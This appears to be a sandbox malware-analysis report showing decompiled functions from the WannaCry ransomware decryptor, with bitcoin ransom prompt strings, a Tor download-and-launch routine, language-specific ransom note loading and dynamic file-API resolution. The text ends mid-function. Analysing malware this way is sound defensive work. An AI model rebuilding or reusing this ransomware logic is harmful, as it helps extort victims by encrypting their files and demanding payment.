                                                      					_t125 =  *((intOrPtr*)(_t211 + 0xac));
                                                      					if(_t125 != 0) {
                                                      						InvalidateRect( *(_t136 + 0x20), 0, 1);
                                                      						_push( *((intOrPtr*)(_t136 + 0x824)));
                                                      						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                                      						_push( *((intOrPtr*)(_t136 + 0x824)));
                                                      						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                                      					}
                                                      				}
                                                      				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
                                                      				return _t125;
                                                      			}

                                                      APIs
                                                      • time.MSVCRT ref: 004076DA
                                                      • sprintf.MSVCRT ref: 0040780E
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                                      • #540.MFC42 ref: 00407876
                                                      • _ftol.MSVCRT ref: 004078AA
                                                      • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                                      • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                                      • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                                      • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                                      • #3092.MFC42(00000402,?), ref: 0040791D
                                                      • #6199.MFC42(00000402,?), ref: 00407924
                                                      • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                                      • #800.MFC42 ref: 0040799F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                                      • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                                      • API String ID: 993288296-3256873439
                                                      • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                                      • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                                      • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00405E10(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				void* _t86;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr* _t122;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr* _t124;
                                                      				intOrPtr* _t125;
                                                      				intOrPtr* _t126;
                                                      				intOrPtr* _t127;
                                                      				intOrPtr _t132;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413C65);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t132;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t121 = __ecx + 0x890;
                                                      				_v16 = _t121;
                                                      				 *_t121 = 0x415c00;
                                                      				_v4 = 0x1d;
                                                      				L00412D52();
                                                      				 *_t121 = 0x415bec;
                                                      				_t122 = __ecx + 0x888;
                                                      				_v16 = _t122;
                                                      				 *_t122 = 0x415c00;
                                                      				_v4 = 0x1e;
                                                      				L00412D52();
                                                      				 *_t122 = 0x415bec;
                                                      				_t123 = __ecx + 0x880;
                                                      				_v16 = _t123;
                                                      				 *_t123 = 0x415c00;
                                                      				_v4 = 0x1f;
                                                      				L00412D52();
                                                      				 *_t123 = 0x415bec;
                                                      				_t124 = __ecx + 0x878;
                                                      				_v16 = _t124;
                                                      				 *_t124 = 0x415c00;
                                                      				_v4 = 0x20;
                                                      				L00412D52();
                                                      				 *_t124 = 0x415bec;
                                                      				_v4 = 0x18;
                                                      				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x870);
                                                      				_v4 = 0x17;
                                                      				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x868);
                                                      				_v4 = 0x16;
                                                      				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x860);
                                                      				_v4 = 0x15;
                                                      				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x858);
                                                      				_t125 = __ecx + 0x850;
                                                      				_v16 = _t125;
                                                      				 *_t125 = 0x415c00;
                                                      				_v4 = 0x21;
                                                      				L00412D52();
                                                      				 *_t125 = 0x415bec;
                                                      				_v4 = 0x13;
                                                      				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x848);
                                                      				_v4 = 0x12;
                                                      				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x840);
                                                      				_v4 = 0x11;
                                                      				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                                      				E00403F20(__ecx + 0x838);
                                                      				_t126 = __ecx + 0x830;
                                                      				_v16 = _t126;
                                                      				 *_t126 = 0x415c00;
                                                      				_v4 = 0x22;
                                                      				L00412D52();
                                                      				 *_t126 = 0x415bec;
                                                      				_v4 = 0xf;
                                                      				L00412CC2();
                                                      				_v4 = 0xe;
                                                      				L00412CC2();
                                                      				_v4 = 0xd;
                                                      				L00412CC2();
                                                      				_v4 = 0xc;
                                                      				L00412CC2();
                                                      				_v4 = 0xb;
                                                      				L00412EF6();
                                                      				_v4 = 0xa;
                                                      				E004050A0(__ecx + 0x444);
                                                      				_v4 = 9;
                                                      				E004050A0(__ecx + 0x3c8);
                                                      				_v4 = 8;
                                                      				E00404170(__ecx + 0x360);
                                                      				_v4 = 7;
                                                      				E00404170(__ecx + 0x2f8);
                                                      				_v4 = 6;
                                                      				E00404170(__ecx + 0x290);
                                                      				_v4 = 5;
                                                      				E00404170(__ecx + 0x228);
                                                      				_t127 = __ecx + 0x1a4;
                                                      				_v16 = _t127;
                                                      				 *_t127 = 0x4161a4;
                                                      				_v4 = 0x23;
                                                      				L00412F0E();
                                                      				_v4 = 4;
                                                      				L00412C9E();
                                                      				_v4 = 3;
                                                      				_t86 = E00405D90(__ecx + 0x120);
                                                      				_v4 = 2;
                                                      				L00412EF0();
                                                      				_v4 = 1;
                                                      				L00412EF0();
                                                      				_v4 = 0;
                                                      				L00412D4C();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t86;
                                                      			}

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                                      • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                                      • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                                      • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                                      • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                                      • String ID: #
                                                      • API String ID: 2377847243-1885708031
                                                      • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                                      • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E004032C0(intOrPtr __ecx) {
                                                      				intOrPtr _t16;
                                                      				long _t17;
                                                      				struct HFONT__* _t19;
                                                      				long _t20;
                                                      				long _t21;
                                                      				long _t23;
                                                      				int _t35;
                                                      				int _t38;
                                                      				int _t40;
                                                      				int _t47;
                                                      				intOrPtr _t48;
                                                      
                                                      				_t48 = __ecx;
                                                      				L00412CB0();
                                                      				_t16 =  *0x42189c; // 0x0
                                                      				_t17 =  *(_t16 + 0x824);
                                                      				 *(__ecx + 0xe8) = _t17;
                                                      				_push(CreateSolidBrush(_t17));
                                                      				L00412D5E();
                                                      				_t47 = __ecx + 0xec;
                                                      				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t19);
                                                      				L00412D5E();
                                                      				_push(0x408);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t35 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t35 = 0;
                                                      				}
                                                      				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
                                                      				_push(0x409);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t38 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t38 = 0;
                                                      				}
                                                      				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t40 =  *(_t47 + 4);
                                                      				} else {
                                                      					_t40 = 0;
                                                      				}
                                                      				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
                                                      				_push(0x40e);
                                                      				L00412CE6();
                                                      				if(_t47 != 0) {
                                                      					_t47 =  *(_t47 + 4);
                                                      				}
                                                      				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
                                                      				E00403CB0(_t48);
                                                      				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
                                                      				_push(0xffffffff);
                                                      				_push(0xffffffff);
                                                      				_push(0);
                                                      				_push("Path");
                                                      				_push(0);
                                                      				L00412D58();
                                                      				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
                                                      				 *0x4217bc = _t48;
                                                      				return 1;
                                                      			}

                                                      APIs
                                                      • #4710.MFC42 ref: 004032C5
                                                      • CreateSolidBrush.GDI32(?), ref: 004032DC
                                                      • #1641.MFC42(00000000), ref: 004032E9
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                                      • #1641.MFC42(00000000), ref: 0040331F
                                                      • #3092.MFC42(00000408,00000000), ref: 0040332B
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                                      • #3092.MFC42(00000409), ref: 00403353
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                                      • #3092.MFC42(00000002), ref: 00403372
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                                      • #3092.MFC42(0000040E), ref: 00403394
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                                      • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                                      • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                                      • String ID: Arial$Path
                                                      • API String ID: 2448086372-1872211634
                                                      • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                                      • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E00406AE0(void* __ecx) {
                                                      				char _v4;
                                                      				char _v12;
                                                      				char _v24;
                                                      				char _v28;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				void* _v280;
                                                      				char _v284;
                                                      				char _v288;
                                                      				char _v292;
                                                      				void* _v296;
                                                      				char _v300;
                                                      				intOrPtr _v304;
                                                      				char _v308;
                                                      				void* _v312;
                                                      				void* _v316;
                                                      				char** _t26;
                                                      				long _t30;
                                                      				void* _t31;
                                                      				char** _t32;
                                                      				void* _t56;
                                                      				intOrPtr _t58;
                                                      				void* _t60;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E61);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_t56 = __ecx;
                                                      				L00412DA6();
                                                      				_t26 =  &_v284;
                                                      				_push(_t26);
                                                      				_v4 = 0;
                                                      				L00412DD6();
                                                      				_push("msg\\");
                                                      				L00412CAA();
                                                      				_push("m_%s.wnry");
                                                      				_push(_t26);
                                                      				_push( &_v288);
                                                      				_v12 = 1;
                                                      				L00412CCE();
                                                      				sprintf( &_v292,  *_t26, _v304);
                                                      				_t60 = _t58 - 0x110 + 0xc;
                                                      				L00412CC2();
                                                      				_v24 = 0;
                                                      				L00412CC2();
                                                      				_t30 = GetFileAttributesA( &_v292);
                                                      				if(_t30 == 0xffffffff) {
                                                      					_push("msg\\");
                                                      					L00412CAA();
                                                      					_push("m_%s.wnry");
                                                      					_push(_t30);
                                                      					_t32 =  &_v300;
                                                      					_v28 = 2;
                                                      					_push(_t32);
                                                      					L00412CCE();
                                                      					sprintf( &_v308,  *_t32, "English");
                                                      					_t60 = _t60 + 0xc;
                                                      					L00412CC2();
                                                      					_v40 = 0;
                                                      					L00412CC2();
                                                      				}
                                                      				_t31 = E00406CF0(_t56,  &_v292);
                                                      				_v28 = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] = _v36;
                                                      				return _t31;
                                                      			}



























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                                      • String ID: English$m_%s.wnry$msg\
                                                      • API String ID: 3713669620-4206458537
                                                      • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                                      • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E0040B840() {
                                                      				void _v519;
                                                      				char _v520;
                                                      				void _v1039;
                                                      				char _v1040;
                                                      				struct _STARTUPINFOA _v1108;
                                                      				struct _PROCESS_INFORMATION _v1124;
                                                      				char _t29;
                                                      				void* _t46;
                                                      				char _t47;
                                                      				void* _t55;
                                                      				void* _t56;
                                                      				void* _t84;
                                                      				void* _t86;
                                                      
                                                      				_t29 =  *0x421798; // 0x0
                                                      				_v1040 = _t29;
                                                      				memset( &_v1039, 0, 0x81 << 2);
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
                                                      				_t84 =  &_v1124 + 0x20;
                                                      				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
                                                      					L8:
                                                      					_v1108.cb = 0x44;
                                                      					_v1124.hProcess = 0;
                                                      					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
                                                      					_v1124.hThread = 0;
                                                      					_v1124.dwProcessId = 0;
                                                      					_v1124.dwThreadId = 0;
                                                      					_v1108.wShowWindow = 0;
                                                      					_v1108.dwFlags = 1;
                                                      					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
                                                      						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
                                                      							WaitForSingleObject(_v1124.hProcess, 0x7530);
                                                      						}
                                                      						CloseHandle(_v1124);
                                                      						CloseHandle(_v1124.hThread);
                                                      						return 1;
                                                      					} else {
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					_t46 = E0040B6A0("TaskData", 0x4220e4, 0);
                                                      					_t86 = _t84 + 0xc;
                                                      					if(_t46 != 0) {
                                                      						L5:
                                                      						_t47 =  *0x421798; // 0x0
                                                      						_v520 = _t47;
                                                      						memset( &_v519, 0, 0x81 << 2);
                                                      						asm("stosw");
                                                      						asm("stosb");
                                                      						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
                                                      						_t84 = _t86 + 0x20;
                                                      						if(GetFileAttributesA( &_v520) != 0xffffffff) {
                                                      							CopyFileA( &_v520,  &_v1040, 0);
                                                      							goto L8;
                                                      						} else {
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						_push(0);
                                                      						_t55 = E0040B780( &_v1040, "TaskData", 0x422148);
                                                      						_t86 = _t86 + 0xc;
                                                      						if(_t55 != 0) {
                                                      							goto L5;
                                                      						} else {
                                                      							_push(0);
                                                      							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
                                                      							_t86 = _t86 + 0xc;
                                                      							if(_t56 != 0) {
                                                      								goto L5;
                                                      							} else {
                                                      								return _t56;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

















                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040B87A
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                                      • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      • sprintf.MSVCRT ref: 0040B924
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                                        • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                        • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                        • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                        • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                                      • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                      Strings
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                                      • String ID: %s\%s\%s$D$TaskData$Tor$taskhsvc.exe$tor.exe
                                                      • API String ID: 4284242699-636499233
                                                      • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                                      • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402C40() {
                                                      				_Unknown_base(*)()* _t11;
                                                      				struct HINSTANCE__* _t23;
                                                      
                                                      				if(E00404B70() == 0) {
                                                      					L12:
                                                      					return 0;
                                                      				} else {
                                                      					if( *0x4217a0 == 0) {
                                                      						_t23 = LoadLibraryA("kernel32.dll");
                                                      						if(_t23 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
                                                      							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
                                                      							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
                                                      							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
                                                      							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
                                                      							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
                                                      							_t11 = GetProcAddress(_t23, "CloseHandle");
                                                      							 *0x4217b8 = _t11;
                                                      							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
                                                      								goto L12;
                                                      							} else {
                                                      								return 1;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				}
                                                      			}






                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                                      • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                                      Strings
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                      • API String ID: 2238633743-1294736154
                                                      • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                                      • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00405580(void* __ecx) {
                                                      				int _v8;
                                                      				intOrPtr _v12;
                                                      				char _v28;
                                                      				char _v80;
                                                      				void* _v96;
                                                      				struct tagRECT _v112;
                                                      				signed int _v116;
                                                      				void* _v120;
                                                      				struct HDC__* _v140;
                                                      				long _v144;
                                                      				struct tagRECT _v160;
                                                      				char _v164;
                                                      				void* _v172;
                                                      				intOrPtr _v176;
                                                      				char _v188;
                                                      				int _v192;
                                                      				int _v196;
                                                      				int _v204;
                                                      				intOrPtr _v212;
                                                      				void* _v216;
                                                      				struct HBRUSH__* _v220;
                                                      				char _v224;
                                                      				intOrPtr _v228;
                                                      				void* _v244;
                                                      				intOrPtr _v248;
                                                      				intOrPtr _v252;
                                                      				signed int _v256;
                                                      				void* _v260;
                                                      				void* _v264;
                                                      				void* _v268;
                                                      				int _v272;
                                                      				intOrPtr _v296;
                                                      				intOrPtr _v300;
                                                      				intOrPtr _v304;
                                                      				int _t78;
                                                      				long _t79;
                                                      				struct HBRUSH__* _t80;
